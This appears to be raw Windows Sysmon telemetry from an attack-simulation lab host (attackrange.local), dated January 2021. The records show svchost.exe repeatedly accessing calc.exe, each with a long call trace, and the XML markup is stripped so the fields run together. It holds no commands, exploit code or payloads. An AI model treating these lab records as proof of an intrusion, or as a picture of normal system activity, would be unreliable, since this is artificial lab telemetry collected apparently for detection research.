22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360844Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360843Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360842Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360841Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360840Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360839Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360838Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360837Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360836Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360835Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360834Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360833Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360832Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360831Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360830Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360829Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360828Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360827Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360826Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360825Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360824Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 